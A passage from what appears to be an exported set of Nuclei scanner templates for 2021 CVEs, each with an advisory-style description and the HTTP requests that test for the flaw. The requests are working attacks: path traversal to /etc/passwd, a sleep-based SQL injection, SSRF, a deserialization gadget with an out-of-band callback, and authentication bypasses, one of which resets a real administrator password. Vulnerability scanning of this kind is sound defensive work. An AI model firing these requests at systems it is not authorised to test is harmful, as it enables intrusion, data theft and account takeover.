GET\n path:\n - \"{{BaseURL}}/static?/%2557EB-INF/web.xml\"\n - \"{{BaseURL}}/concat?/%2557EB-INF/web.xml\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/xml\"\n\n - type: word\n part: body\n words:\n - \"\"\n - \"java.sun.com\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210099d1285740ade18a2d452515bacddf15f7433c6ef658f2b8640ed13791476a7e022048d15f48ee10c490f6696a29b8999737d08894c5770fc0d7973844f075ce1238:922c64590222798bb761d5b6d8e72950", "hash": "9c8696cbed1eeae9fb2ef04c6ed53901", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30832c" }, "name": "CVE-2021-28377.yaml", "content": "id: CVE-2021-28377\n\ninfo:\n name: Joomla! ChronoForums 2.0.11 - Local File Inclusion\n author: 0x_Akoko\n severity: medium\n description: Joomla! ChronoForums 2.0.11 avatar function is vulnerable to local file inclusion through unauthenticated path traversal attacks. This enables an attacker to read arbitrary files, for example the Joomla! configuration file which contains credentials.\n impact: |\n The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing remote code execution.\n remediation: |\n Update Joomla! 
ChronoForums to the latest version (2.0.12) or apply the provided patch to fix the LFI vulnerability.\n reference:\n - https://herolab.usd.de/en/security-advisories/usd-2021-0007/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-28377\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2021-28377\n cwe-id: CWE-22\n epss-score: 0.00106\n epss-percentile: 0.42913\n cpe: cpe:2.3:a:chronoengine:chronoforums:2.0.11:*:*:*:*:joomla:*:*\n metadata:\n max-request: 1\n vendor: chronoengine\n product: chronoforums\n framework: joomla\n tags: cve2021,cve,chronoforums,lfi,joomla,chronoengine\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d6e6b6ae214509b16663c1be174481963518b40031b35c0ebb448735a7f82f2b022100e97e0b83c9fb1f14e13a75823cc9ebf58a93104083b1efa179e9d0045b26eec2:922c64590222798bb761d5b6d8e72950", "hash": "0f383474fcb7d8a8b8cb7c485e4c0715", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30832d" }, "name": "CVE-2021-28419.yaml", "content": "id: CVE-2021-28419\n\ninfo:\n name: SEO Panel 4.8.0 - Blind SQL Injection\n author: theamanrawat\n severity: high\n description: |\n SEO Panel 4.8.0 is susceptible to time-based blind SQL injection via the order_col parameter in archive.php. 
An attacker can potentially retrieve all databases and thus obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database.\n remediation: |\n Upgrade to a patched version of SEO Panel or apply the necessary security patches.\n reference:\n - https://github.com/seopanel/Seo-Panel/issues/209\n - https://www.seopanel.org/spdownload/4.8.0\n - https://nvd.nist.gov/vuln/detail/CVE-2021-28419\n - http://packetstormsecurity.com/files/162322/SEO-Panel-4.8.0-SQL-Injection.html\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2021-28419\n cwe-id: CWE-89\n epss-score: 0.17236\n epss-percentile: 0.95637\n cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: seopanel\n product: seo_panel\n tags: cve2021,cve,sqli,seopanel,auth,packetstorm\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n Cookie: _csrf={{rand_base(54,\"abc\")}};\n - |\n POST /login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n Referer: {{BaseURL}}login.php\n Cookie: _csrf={{rand_base(54,\"abc\")}};\n\n sec=login&red_referer=http%3A%2F%2F{{BaseURL}}&userName={{username}}&password={{password}}&login=\n - |\n GET /archive.php?from_time=2021-04-25&order_col=(SELECT+7397+FROM(SELECT(SLEEP(3)))test)&order_val=DESC&report_type=website-search-reports&search_name=&sec=viewWebsiteSearchSummary&to_time=2021-04-25&website_id= HTTP/1.1\n Host: {{Hostname}}\n Cookie: _csrf={{rand_base(54,\"abc\")}};\n\n matchers:\n - type: dsl\n dsl:\n - 'duration_3>=6'\n - 'status_code_3 == 200'\n - 'contains(body_3, \"Overall Report Summary\")'\n condition: and\n# digest: 
4b0a00483046022100ece85ed0a3e7f7b62a57b55f6bcc77db0d19a90ecb24f30602d76c261fe03159022100f1481ca4357aab094b84c582f7d0dea2013206ee99a0d03a7ced0a91ecf93b59:922c64590222798bb761d5b6d8e72950", "hash": "42aeaf1c5e2dd125aa691bc3c5ffb90f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30832e" }, "name": "CVE-2021-28854.yaml", "content": "id: CVE-2021-28854\n\ninfo:\n name: VICIdial Sensitive Information Disclosure\n author: pdteam\n severity: high\n description: VICIdial's Web Client is susceptible to information disclosure because it contains many sensitive files that can be accessed from the client side. These files contain mysqli logs, auth logs, debug information, successful and unsuccessful login attempts with their corresponding IP's, User-Agents, credentials and much more. This information can be leveraged by an attacker to gain further access to VICIdial systems.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, such as user credentials or customer data.\n remediation: |\n Apply the latest security patches and updates provided by VICIdial to fix the vulnerability and ensure sensitive information is properly protected.\n reference:\n - https://github.com/JHHAX/VICIdial\n classification:\n cve-id: CVE-2021-28854\n metadata:\n max-request: 1\n tags: cve2021,cve,sqli\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/agc/vicidial_mysqli_errors.txt\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - 'text/plain'\n part: header\n\n - type: status\n status:\n - 200\n\n - type: word\n words:\n - 'vdc_db_query'\n part: body\n# digest: 4a0a004730450220489b98ebac6129b4e632e2014c7658c03aec08c7ca984b53e3c45692cae46263022100b3dec3ba24f3da255e94dd1a2e55e52377ca50129fb3840688a253fd5f07eef4:922c64590222798bb761d5b6d8e72950", "hash": "937d38a6174f82c17490819d5c0f6e3e", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30832f" }, "name": 
"CVE-2021-28918.yaml", "content": "id: CVE-2021-28918\n\ninfo:\n name: Netmask NPM Package - Server-Side Request Forgery\n author: johnjhacking\n severity: critical\n description: Netmask NPM Package is susceptible to server-side request forgery because of improper input validation of octal strings in netmask npm package. This allows unauthenticated remote attackers to perform indeterminate SSRF, remote file inclusion, and local file inclusion attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts.\n impact: |\n An attacker can exploit this vulnerability to make requests to internal resources, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Upgrade to Netmask version 2.0.0 or later, which includes a fix for this vulnerability.\n reference:\n - https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md\n - https://github.com/advisories/GHSA-pch5-whg9-qr2r\n - https://nvd.nist.gov/vuln/detail/CVE-2021-28918\n - https://github.com/rs/node-netmask\n - https://rootdaemon.com/2021/03/29/vulnerability-in-netmask-npm-package-affects-280000-projects/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n cvss-score: 9.1\n cve-id: CVE-2021-28918\n cwe-id: CWE-704\n epss-score: 0.02704\n epss-percentile: 0.89404\n cpe: cpe:2.3:a:netmask_project:netmask:*:*:*:*:*:node.js:*:*\n metadata:\n max-request: 3\n vendor: netmask_project\n product: netmask\n framework: node.js\n tags: cve2021,cve,npm,netmask,ssrf,lfi,netmask_project,node.js\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?url=http://0177.0.0.1/server-status\"\n - \"{{BaseURL}}/?host=http://0177.0.0.1/server-status\"\n - \"{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd\"\n\n stop-at-first-match: true\n\n matchers-condition: or\n matchers:\n - type: word\n part: body\n words:\n - \"Apache Server Status\"\n - \"Server 
Version\"\n condition: and\n\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n# digest: 4a0a00473045022100b939a30c5fa64f54a4180624144395644b93b75e550c7fda141b0701557eb81a022020316b99faf609c753aa339b44f4c18e3ee753c37e12bb8458c089b611608981:922c64590222798bb761d5b6d8e72950", "hash": "dfd071952b0a53d1415f6bdded6b996d", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308330" }, "name": "CVE-2021-28937.yaml", "content": "id: CVE-2021-28937\n\ninfo:\n name: Acexy Wireless-N WiFi Repeater REV 1.0 - Repeater Password Disclosure\n author: geeknik\n severity: high\n description: Acexy Wireless-N WiFi Repeater REV 1.0 is vulnerable to password disclosure because the password.html page of the web management interface contains the administrator account password in plaintext.\n impact: |\n An attacker can obtain the repeater's password, compromising the security of the network.\n remediation: |\n Update the firmware to the latest version or replace the vulnerable repeater with a secure alternative.\n reference:\n - https://blog-ssh3ll.medium.com/acexy-wireless-n-wifi-repeater-vulnerabilities-8bd5d14a2990\n - http://acexy.com\n - https://nvd.nist.gov/vuln/detail/CVE-2021-28937\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-28937\n cwe-id: CWE-312\n epss-score: 0.02476\n epss-percentile: 0.88958\n cpe: cpe:2.3:o:acexy:wireless-n_wifi_repeater_firmware:28.08.06.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: acexy\n product: wireless-n_wifi_repeater_firmware\n tags: cve2021,cve,acexy,disclosure,iot\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/password.html\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"Password Setting\"\n - \"addCfg('username'\"\n - \"addCfg('newpass'\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 
4b0a00483046022100f7ec4fddabd7c4e5b1c92e0a85de60107cb725edc697e92e2eec4031dc194c4f022100fa8b0762adbb4978b6f4b3b73d9e186a6a3e682452584d6b5cab085151013335:922c64590222798bb761d5b6d8e72950", "hash": "baa70d863383137f2a059d84faa48f7a", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308331" }, "name": "CVE-2021-29006.yaml", "content": "id: CVE-2021-29006\n\ninfo:\n name: rConfig 3.9.6 - Local File Inclusion\n author: r3Y3r53\n severity: medium\n description: |\n rConfig 3.9.6 is affected by a Local File Disclosure vulnerability. An authenticated user may successfully download any file on the server.\n reference:\n - https://github.com/mrojz/rconfig-exploit/blob/main/CVE-2021-29006-POC.py\n - https://nvd.nist.gov/vuln/detail/CVE-2021-29006\n - http://rconfig.com\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2021-29006\n cwe-id: CWE-22\n epss-score: 0.09465\n epss-percentile: 0.94172\n cpe: cpe:2.3:a:rconfig:rconfig:3.9.6:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: rconfig\n product: rconfig\n shodan-query: http.title:\"rConfig\"\n tags: cve2021,cve,rconfig,authenticated,lfi\n\nhttp:\n - raw:\n - |\n POST /lib/crud/userprocess.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n user={{username}}&pass={{password}}&sublogin=1\n - |\n GET /dashboard.php HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /lib/ajaxHandlers/ajaxGetFileByPath.php?path=/etc/passwd HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body_3\n regex:\n - 'root:.*:0:0:'\n\n - type: word\n part: body_2\n words:\n - 'rconfig'\n\n - type: status\n part: header_3\n status:\n - 200\n# digest: 4a0a0047304502207fdb822293ed117ac244b6204a862e4cd97d7ed5b1a6da75806a95ba16942845022100cbb141a3f60efdaf36945a8ed3e93034fdb9dfa1e221d0ad775fbc7319d814a5:922c64590222798bb761d5b6d8e72950", "hash": 
"c9a738623472ed3e4fe30af76f1fddd0", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308332" }, "name": "CVE-2021-29156.yaml", "content": "id: CVE-2021-29156\n\ninfo:\n name: LDAP Injection In OpenAM\n author: melbadry9,xelkomy\n severity: high\n description: OpenAM contains an LDAP injection vulnerability. When a user tries to reset their password, they are asked to enter a username, and then the backend validates whether the user exists or not through an LDAP query. If the user exists, the password reset token is sent to the user's email. Enumeration can allow for full password retrieval.\n impact: |\n Allows an attacker to execute arbitrary LDAP queries and potentially gain unauthorized access to sensitive information or perform unauthorized actions.\n remediation: Upgrade to OpenAM commercial version 13.5.1 or later.\n reference:\n - https://github.com/sullo/advisory-archives/blob/master/Forgerock_OpenAM_LDAP_injection.md\n - https://hackerone.com/reports/1278050\n - https://www.guidepointsecurity.com/blog/ldap-injection-in-forgerock-openam-exploiting-cve-2021-29156/\n - https://portswigger.net/research/hidden-oauth-attack-vectors\n - https://bugster.forgerock.org/jira/browse/OPENAM-10135\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-29156\n cwe-id: CWE-74\n epss-score: 0.30859\n epss-percentile: 0.96857\n cpe: cpe:2.3:a:forgerock:openam:*:*:*:*:*:*:*:*\n metadata:\n max-request: 3\n vendor: forgerock\n product: openam\n shodan-query: http.title:\"OpenAM\"\n tags: cve2021,cve,openam,ldap,injection,forgerock\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/openam/ui/PWResetUserValidation\"\n - \"{{BaseURL}}/OpenAM-11.0.0/ui/PWResetUserValidation\"\n - \"{{BaseURL}}/ui/PWResetUserValidation\"\n\n matchers:\n - type: 
dsl\n dsl:\n - 'contains(body, \"jato.pageSession\") && status_code==200'\n# digest: 4b0a00483046022100f68e3d98c58d25d03ff3e8158d70a9ad115e6df55f3f08a9e018c8c60ff399bf022100ff6e52bcdc34a7cadbffc2d9434a6273c3c09e60f8b00b28475b6dbd257f383d:922c64590222798bb761d5b6d8e72950", "hash": "f85d77e3846a16e3f9584d07d8487b8e", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308333" }, "name": "CVE-2021-29200.yaml", "content": "id: CVE-2021-29200\n\ninfo:\n name: Apache OFBiz < 17.12.07 - Arbitrary Code Execution\n author: your3cho\n severity: critical\n description: |\n Apache OFBiz has unsafe deserialization prior to 17.12.07 version An unauthenticated user can perform an RCE attack\n reference:\n - http://www.openwall.com/lists/oss-security/2021/04/27/4\n - https://nvd.nist.gov/vuln/detail/CVE-2021-29200\n - https://github.com/freeide/CVE-2021-29200\n - https://lists.apache.org/thread.html/r108a964764b8bd21ebd32ccd4f51c183ee80a251c105b849154a8e9d%40%3Ccommits.ofbiz.apache.org%3E\n - https://lists.apache.org/thread.html/r708351f1a8af7adb887cc3d8a92bed8fcbff4a9e495e69a9ee546fda%40%3Cnotifications.ofbiz.apache.org%3E\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-29200\n cwe-id: CWE-502\n epss-score: 0.90403\n epss-percentile: 0.98567\n cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: ofbiz\n shodan-query: html:\"OFBiz\"\n fofa-query: app=\"Apache_OFBiz\"\n tags: cve2021,cve,apache,ofbiz,deserialization,rce\n\nhttp:\n - raw:\n - |\n POST /webtools/control/SOAPService HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/xml\n\n \n \n \n \n \n \n \n {{generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"hex\")}}\n \n \n \n \n \n \n \n \n \n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"dns\"\n\n - type: word\n part: body\n words:\n - 
'value=\"responseMessage\"'\n# digest: 4a0a00473045022100842f48db1f533b0389671ceacc6111d6a44a0afdfc37ff547588aad0db0d2ce2022016235842d399bdd5cd3de0e7a4ffe58712448327b137121c349c382f12604969:922c64590222798bb761d5b6d8e72950", "hash": "86d2e77439069fff6ec49c8e1b1cb8e3", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308334" }, "name": "CVE-2021-29203.yaml", "content": "id: CVE-2021-29203\n\ninfo:\n name: HPE Edgeline Infrastructure Manager <1.22 - Authentication Bypass\n author: madrobot\n severity: critical\n description: |\n HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22 contains an authentication bypass vulnerability which could be remotely exploited to bypass remote authentication and possibly lead to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration.\n Warning: this template is not read-only. Its first request (an unauthenticated PATCH to /redfish/v1/SessionService/ResetPassword/1/) resets the Administrator password to a random value, which the second request then uses to log in; on a vulnerable device this changes the real administrator's password. Run it only with explicit authorization and be prepared to restore the credential.\n impact: |\n Successful exploitation of this vulnerability could result in unauthorized access to sensitive information, unauthorized configuration changes, or disruption of the affected system.\n remediation: |\n Upgrade to HPE Edgeline Infrastructure Manager version 1.22 or later to mitigate this vulnerability.\n reference:\n - https://www.tenable.com/security/research/tra-2021-15\n - https://nvd.nist.gov/vuln/detail/CVE-2021-29203\n - https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbgn04124en_us\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-29203\n cwe-id: CWE-306\n epss-score: 0.95519\n epss-percentile: 0.99258\n cpe: cpe:2.3:a:hp:edgeline_infrastructure_manager:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: hp\n product: edgeline_infrastructure_manager\n tags: cve2021,cve,hpe,bypass,tenable,hp\n\nhttp:\n - raw:\n - |\n PATCH 
/redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Content-Type: application/json\n\n {\"Password\":\"{{randstr}}\"}\n - |\n POST /redfish/v1/SessionService/Sessions/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n {\"UserName\":\"Administrator\",\"Password\":\"{{randstr}}\"}\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"X-Auth-Token\"\n - \"PasswordReset\"\n - \"Location\"\n condition: and\n\n - type: word\n part: body\n words:\n - \"Base.1.0.Created\"\n\n - type: status\n status:\n - 201\n# digest: 4b0a00483046022100c7161451646d6a32f88513326984a5378871e42c39116388da64bb5234bb53cc022100a496b69cc17baef6be5e7b210c42daf08c840af4df3b421118b17ae99875b4e5:922c64590222798bb761d5b6d8e72950", "hash": "14eb8f7cefa115ede9c8744669aff0ff", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308335" }, "name": "CVE-2021-29441.yaml", "content": "id: CVE-2021-29441\n\ninfo:\n name: Nacos <1.4.1 - Authentication Bypass\n author: dwisiswant0\n severity: critical\n description: |\n This template only works on Nuclei engine prior to version 2.3.3 and version >= 2.3.5.\n\n In Nacos before version 1.4.1, when configured to use authentication (-Dnacos.core.auth.enabled=true)\n Nacos uses the AuthFilter servlet filter to enforce authentication. 
This filter has a backdoor that\n enables Nacos servers to bypass this filter and therefore skip authentication checks.\n This mechanism relies on the user-agent HTTP header so it can be easily spoofed.\n This issue may allow any user to carry out any administrative tasks on the Nacos server.\n Note: this template is not read-only; on a vulnerable target the second request (sent with the spoofed User-Agent) publishes a configuration entry (dataId nacos.cfg.dataIdfoo, group foo, content helloWorld), which should be removed after testing.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive data and potential compromise of the Nacos server.\n remediation: |\n Upgrade Nacos to version 1.4.1 or later to mitigate the authentication bypass vulnerability (CVE-2021-29441).\n reference:\n - https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/\n - https://github.com/alibaba/nacos/issues/4701\n - https://github.com/advisories/GHSA-36hp-jr8h-556f\n - https://github.com/alibaba/nacos/pull/4703\n - https://github.com/bakery312/Vulhub-Reproduce\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-29441\n cwe-id: CWE-290\n epss-score: 0.96598\n epss-percentile: 0.99603\n cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: alibaba\n product: nacos\n tags: cve2021,cve,nacos,auth-bypass,alibaba\n\nhttp:\n - raw:\n - |\n POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n - |\n POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n User-Agent: Nacos-Server\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - \"status_code_1 == 403\"\n - \"status_code_2 == 200\"\n condition: and\n\n - type: dsl\n dsl:\n - \"contains(body_1, 'Forbidden')\"\n - \"body_2 == 'true'\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/json\"\n# digest: 
4b0a00483046022100c8f6e5b49ec78c3583d2a7ff0a3f4cf62b8310ee7956fcde381ed13ba7d30767022100fe6dd0baed8b64e99e050bd2998107dcf78755160d6064bfea8bb2b15e5b0b3a:922c64590222798bb761d5b6d8e72950", "hash": "2d0d2236f84b47ddfa22cf1d4321c8cd", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308336" }, "name": "CVE-2021-29442.yaml", "content": "id: CVE-2021-29442\n\ninfo:\n name: Nacos <1.4.1 - Authentication Bypass\n author: dwisiswant0\n severity: high\n description: |\n Nacos before version 1.4.1 is vulnerable to authentication bypass because the ConfigOpsController lets the user perform management operations like querying the database or even wiping it out. While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users. These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. 
mysql).\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive data and potential compromise of the Nacos server.\n remediation: |\n Upgrade Nacos to version 1.4.1 or later to mitigate the authentication bypass vulnerability (CVE-2021-29442).\n reference:\n - https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/\n - https://github.com/alibaba/nacos/issues/4463\n - https://github.com/alibaba/nacos/pull/4517\n - https://github.com/advisories/GHSA-36hp-jr8h-556f\n - https://nvd.nist.gov/vuln/detail/CVE-2021-29442\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-29442\n cwe-id: CWE-306\n epss-score: 0.9676\n epss-percentile: 0.99596\n cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: alibaba\n product: nacos\n tags: cve2021,cve,nacos,auth-bypass,alibaba\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: regex\n part: body\n regex:\n - \"\\\"TABLENAME\\\":\\\"(?:(?:(?:(?:(?:APP_CONFIGDATA_RELATION_[PS]UB|SYS(?:(?:CONGLOMERAT|ALIAS|(?:FI|RO)L)E|(?:(?:ROUTINE)?|COL)PERM|(?:FOREIGN)?KEY|CONSTRAINT|T(?:ABLEPERM|RIGGER)|S(?:TAT(?:EMENT|ISTIC)|EQUENCE|CHEMA)|DEPEND|CHECK|VIEW|USER)|USER|ROLE)S|CONFIG_(?:TAGS_RELATION|INFO_(?:AGGR|BETA|TAG))|TENANT_CAPACITY|GROUP_CAPACITY|PERMISSIONS|SYSCOLUMNS|SYS(?:DUMMY1|TABLES)|APP_LIST)|CONFIG_INFO)|TENANT_INFO)|HIS_CONFIG_INFO)\\\"\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402201388a197774893b07ac833cc170235546644445e70aaf61aed8f306ab297ab4402201bcd114be7db3bf0c58986c8697b0a3dcfccff01035a9c57014d503de27c864c:922c64590222798bb761d5b6d8e72950", "hash": "51400b7577515bbef6b326bdc513f11b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308337" 
}, "name": "CVE-2021-29484.yaml", "content": "id: CVE-2021-29484\n\ninfo:\n name: Ghost CMS <=4.3.2 - Cross-Site Scripting\n author: rootxharsh,iamnoooob\n severity: medium\n description: Ghost CMS 4.0.0 to 4.3.2 contains a DOM cross-site scripting vulnerability. An unused endpoint added during the development of 4.0.0 allows attackers to gain access by getting logged-in users to click a link containing malicious code.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: This issue has been fixed in 4.3.3.\n reference:\n - https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg\n - https://www.npmjs.com/package/ghost\n - https://forum.ghost.org/t/critical-security-update-available-for-ghost-4-x/22290\n - https://nvd.nist.gov/vuln/detail/CVE-2021-29484\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N\n cvss-score: 6.8\n cve-id: CVE-2021-29484\n cwe-id: CWE-79\n epss-score: 0.01008\n epss-percentile: 0.82062\n cpe: cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:*\n metadata:\n max-request: 1\n vendor: ghost\n product: ghost\n framework: node.js\n tags: cve2021,cve,xss,ghost,node.js\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ghost/preview\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'XMLHttpRequest.prototype.open'\n\n - type: word\n part: header\n words:\n - 'text/html'\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022064bd44c4eb294d3c6ae23aadabeaf4342d055409c28de4185c1568c395efc345022100a32a753e4a9e222c83c6cbb9f73af94180ec63c52b800a77f1b414dfe3cf2272:922c64590222798bb761d5b6d8e72950", "hash": "2059aa4a10847deaa95c95601ab87900", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": 
"66477a413521042ccf308338" }, "name": "CVE-2021-29490.yaml", "content": "id: CVE-2021-29490\n\ninfo:\n name: Jellyfin 10.7.2 - Server Side Request Forgery\n author: alph4byt3\n severity: medium\n description: |\n Jellyfin is a free software media system. Versions 10.7.2 and below are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the imageUrl parameter.\n impact: |\n This vulnerability can lead to unauthorized access to internal resources, potential data leakage, and further exploitation of the target system.\n remediation: Upgrade to version 10.7.3 or newer. As a workaround, disable external access to the API endpoints \"/Items/*/RemoteImages/Download\", \"/Items/RemoteSearch/Image\" and \"/Images/Remote\".\n reference:\n - https://github.com/jellyfin/jellyfin/security/advisories/GHSA-rgjw-4fwc-9v96\n - https://nvd.nist.gov/vuln/detail/CVE-2021-29490\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/HimmelAward/Goby_POC\n - https://github.com/Threekiii/Awesome-POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N\n cvss-score: 5.8\n cve-id: CVE-2021-29490\n cwe-id: CWE-918\n epss-score: 0.00159\n epss-percentile: 0.51433\n cpe: cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: jellyfin\n product: jellyfin\n shodan-query: http.title:\"Jellyfin\"\n tags: cve,cve2021,ssrf,jellyfin,oast\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/Images/Remote?imageUrl=https://oast.me/\"\n - \"{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=https://oast.me/&ProviderName=TheMovieDB\"\n\n stop-at-first-match: true\n matchers:\n - type: word\n part: body\n words:\n - \"

    Interactsh Server

